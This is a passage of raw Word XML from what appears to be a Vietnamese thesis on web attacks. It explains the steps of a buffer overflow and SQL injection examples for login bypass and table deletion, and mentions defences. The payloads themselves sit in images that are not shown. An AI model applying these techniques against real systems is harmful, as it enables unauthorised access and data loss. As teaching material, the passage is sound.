        <w:t>Vùng Text là vùng cố định, chứa các mã lệnh thực thi (instruction) và dữ liệu chỉ đọc (read-only). Vùng này được chia sẻ giữa các tiến trình thực thi cùng một file chương trình và tương ứng với phân đoạn text của file thực thi. Dữ liệu ở vùng này là chỉ đọc, mọi thao tác nhằm ghi lên vùng nhớ này đều gây lỗi segmentation violation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEEB025" w14:textId="347D51E5" w:rsidR="00233B56" w:rsidRPr="00DA0BCA" w:rsidRDefault="00233B56"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Vùng Data chứa các dữ liệu đã được khởi tạo hoặc chưa khởi tạo giá trị. Các biến toàn cục và biến tĩnh được chứa trong vùng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE5A5C" w14:textId="62E9678D" w:rsidR="00221579" w:rsidRPr="00DA0BCA" w:rsidRDefault="00233B56"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Vùng Stack là vùng nhớ được dành riêng khi thực thi chương trình dùng để chứa giá trị các biến cục bộ của hàm, tham số gọi hàm cũng như giá trị trả về. Thao tác trên bộ nhớ stack được thao tác theo cơ chế "vào sau ra trước" - LIFO (Last In, First Out) với hai lệnh quan trọng nhất là PUSH và POP. Trong phạm vi bài viết này, luận văn chỉ tập trung tìm hiểu về vùng stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A0376" w14:textId="0742322C" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc59634020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Một số các gây tràn bộ đệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="75C56EFC" w14:textId="6D17220E" w:rsidR="00233B56" w:rsidRPr="00DA0BCA"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Các bước cơ bản của kỹ thuật tràn bộ đệm là: chuẩn bị bộ đệm dùng để làm tràn, xác định địa chỉ trả về (RET), xác định địa chỉ của bộ đệm chứa shellcode, cuối cùng gọi thực thi chương trình bị tràn bộ đệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FB8B4" w14:textId="7209A8CF" w:rsidR="00233B56" w:rsidRP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Thông qua những ô nhập dữ liệu hacker có thể sử dụng một chuỗi string nhị phân có khả năng thực thi đoạn lệnh trên máy đích hoặc phá vỡ hệ thống do phải xử lí dữ liệu quá dài, vượt khả năng cho phép của hệ thống ( có thể nói cách này cũng là cách tấn công DoS- được nói rõ hơn trong chương 6). Thông thường đoạn mã rất đơn giản, ví dụ như exec(“sh”) để tạo ra một root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B6A73" w14:textId="6DF9517F" w:rsid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Một ví dụ về cách tấn công buffer overflow qua Web là Code Red Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373249FA" w14:textId="6901AC7B" w:rsidR="006B3B79"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17" w:name="_Toc59634021"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006B3B79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ách phòng chống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1F9EA79F" w14:textId="4200BFB4" w:rsidR="00233B56" w:rsidRP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Người thiết kế Web cần phải kiểm tra kĩ kích thước dữ liệu trước khi sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0042C92C" w14:textId="53F8DDEE" w:rsid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Dùng Referer trong HTTP Header để kiểm tra yêu cầu có phải xuất phát từ máy</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00233B56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654D494" w14:textId="445F04BB" w:rsidR="00233B56" w:rsidRPr="00DA0BCA"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Nhận xét:</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Đây là kĩ thuật tấn công đi sâu vào phần hệ thống nhất, đòi hỏi hacker là người hiểu sâu về tổ chức bộ nhớ cũng như về ngôn ngữ lập trình Assembly. Tuy nhiên, điều này chỉ đòi hỏi nếu hacker muốn điều khiển hệ thống. Nếu chỉ sửa đồi nội dung  kích  thước ô nhập để từ đó đưa lên trình chủ một khối dữ liệu lớn để hệ thống có thể bị   phá hủy vì không đủ dung lượng đáp ứng việc yêu cầu xử lí khối dữ </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>liệu đó. Kiểu tấn công này tương tự như kiểu tấn công từ chối dịch vụ được nói rõ hơn trong chương tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77756F3B" w14:textId="052BEAA1" w:rsidR="006B3B79" w:rsidRDefault="00903C21"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18" w:name="_Toc59634022"/>
      <w:r w:rsidR="006B3B79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chèn câu truy vấn SQL (SQL Injection)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5DDB96B6" w14:textId="6432F1ED" w:rsidR="00233B56" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc59634023"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="41109E40" w14:textId="1DDEB2C9" w:rsidR="005C5B18" w:rsidRPr="00DA0BCA" w:rsidRDefault="005C5B18"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SQL Injection là cách lợi dụng những lỗ hổng trong quá trình lập trình Web về phần truy xuất cơ sở dữ liệu. Đây không chỉ là khuyết điểm của riêng SQL Server mà nó  còn là vấn đề chung cho toàn bộ các cơ sở dữ liệu khác như Oracle, MS Access hay IBM DB2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11780B29" w14:textId="71E08A1B" w:rsidR="005C5B18" w:rsidRPr="00DA0BCA" w:rsidRDefault="005C5B18"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Khi hacker gửi những dữ liệu (thông qua các form), ứng dụng Web sẽ thực hiện và    trả về cho trình duyệt kết quả câu truy vấn hay những thông báo lỗi có liên quan đến  cơ sở dữ liệu. Và nhờ những thông tin này mà hacker biết được nội dung cơ sở  dữ  liệu và từ đó có thể điều khiển toàn bộ hệ thống ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67243002" w14:textId="3B77B925" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc59634024"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Các cách tấn công</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="701ED74F" w14:textId="18878502" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>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Kỹ thuật tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC92F13" w14:textId="532BB97E" w:rsidR="005C5B18" w:rsidRPr="00DA0BCA" w:rsidRDefault="005C5B18"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Dưới đây là kĩ thuật SQL injection đơn giản nhất, dùng để vượt qua các form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF994E" w14:textId="77777777" w:rsidR="00DA0BCA" w:rsidRDefault="005C5B18"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đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4B484" w14:textId="19FCF979" w:rsidR="005C5B18" w:rsidRPr="00DA0BCA" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA" w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: giả sử ứng dụng web có đoạn mã sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705D88D" w14:textId="7C8CC914" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>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5AF31E" wp14:editId="4C1129A6">
            <wp:extent cx="5504815" cy="21526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815" cy="2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="639AC109" w14:textId="7F27672A" w:rsidR="005C5B18" w:rsidRPr="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Đoạn mã trên kiểm tra chuỗi nhập Username và Password. Nếu tồn tại trong bảng User thì check=true ngược lại check=false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B078A" w14:textId="7EBB8407" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Giá </w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trị</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhập vào là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863C091" w14:textId="4889FD66" w:rsidR="005C5B18" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>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D9E701" wp14:editId="4977AA75">
            <wp:extent cx="5504815" cy="52387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523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B31C7" w14:textId="196B8AE2" w:rsidR="00DA0BCA"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Câu lệnh SQL lúc này như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC89350" w14:textId="056F49B6" w:rsidR="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>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0ABC04" wp14:editId="0ED32C97">
            <wp:extent cx="5504815" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="63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815" cy="523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Câu lệnh so sánh trên luôn luôn đúng (vì ‘’ luôn bằng ‘’). Do đó câu điều kiện  trong mệnh đề WHERE luôn đúng. Giá trị tên người sử dụng của dòng đầu tiên trong bảng sẽ được chọn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34291037" w14:textId="6458D5D2" w:rsidR="00D9523B" w:rsidRPr="00DA0BCA" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Kết hợp với kí tự đặc biệt của SQL :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FD311" w14:textId="2573D084" w:rsidR="00D9523B" w:rsidRPr="00DA0BCA" w:rsidRDefault="00D9523B"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kí tự “ ; ” : đánh dấu kết thúc 1 câu truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9F1AB" w14:textId="6086F03A" w:rsidR="00D9523B" w:rsidRPr="00DA0BCA" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kí tự “--” : ẩn chuỗi kí tự phía sau nó trên cùng 1 dòng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472532CE" w14:textId="395B356C" w:rsidR="00D9523B"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 xml:space="preserve">Ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC0A89" w14:textId="791AEC56" w:rsidR="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>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0FC8D" wp14:editId="5662476A">
            <wp:extent cx="5153891" cy="5238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575" cy="528462"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9A7D7" w14:textId="744B576C" w:rsidR="00D9523B"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Câu lệnh SQL lúc này như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965C725" w14:textId="108B8DB6" w:rsidR="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>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6FF62D" wp14:editId="135A8DF2">
            <wp:extent cx="5159828" cy="5238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3051" cy="526203"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E42DFA" w14:textId="39E7488E" w:rsidR="00D9523B"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Với câu lệnh trên thì bảng User sẽ bị xóa hoàn toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C498E1" w14:textId="78D74DB1" w:rsidR="00D9523B" w:rsidRPr="00D9523B"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Câu lệnh trên cho phép đăng nhập vào hệ thống với quyền admin mà không đòi   hỏi password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C84134" w14:textId="73236B42" w:rsidR="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ví dụ</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3: Một ví dụ khác sử dụng kí tự đặc biệt SQL để thâm nhập vào hệ thống như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315667B" w14:textId="20643CBA" w:rsidR="00D9523B" w:rsidRPr="005C5B18" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9523B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6294232A" wp14:editId="140427A0">
            <wp:extent cx="5943600" cy="49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14:paraId="0AD48C97" w14:textId="1AAAC623" w:rsidR="00D9523B" w:rsidRDefault="00DA0BCA" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="117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D1387C6" wp14:editId="7E70ED21">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>943610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5243830" cy="5245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524510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Câu lệnh SQL như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73326EF9" w14:textId="470A60EE" w:rsidR="00D9523B" w:rsidRPr="00D9523B" w:rsidRDefault="00D9523B" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Câu lệnh trên cho phép đăng nhập vào hệ thống với quyền admin mà không đòi</w:t>
      </w:r>
      <w:r w:rsidR="00DA0BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hỏi password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203C1DC" w14:textId="75315D40" w:rsidR="006B3B79" w:rsidRDefault="006B3B79" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>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Tấn công qua câu SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC57EC" w14:textId="6FF0A80D" w:rsidR="00D9523B" w:rsidRPr="00107BF3" w:rsidRDefault="00D9523B"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Ngoài kĩ thuật đơn giản trên, việc tấn công thường dựa trên những thông báo lỗi   để lấy thông tin về bảng cũng như những trường trong bảng. Để làm được điều  này, cần phải hiểu những thông báo lỗi và từ đó chỉnh sửa nội dung nhập cho phù hợp</w:t>
      </w:r>
      <w:r w:rsidR="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955C816" w14:textId="05D8EF5A" w:rsidR="00D9523B" w:rsidRPr="00107BF3" w:rsidRDefault="00D9523B"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hái niệm Direct Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D990A0" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00D9523B"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Những đối số được thêm vào trong câu lệnh mà không nằm giữa những dấu nhấy</w:t>
      </w:r>
      <w:r w:rsidR="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08960E" w14:textId="09168592" w:rsidR="00D9523B" w:rsidRPr="00107BF3" w:rsidRDefault="00D9523B"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đơn hay dấu ngoặc kép là trường hợp direct injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E33F3A" w14:textId="1744957B" w:rsidR="00D9523B" w:rsidRDefault="00107BF3" w:rsidP="00E42092">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1E41709" wp14:editId="4D45FA2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>943610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>275590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5285105" cy="295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5105" cy="295275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D9523B" w:rsidRPr="00D9523B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
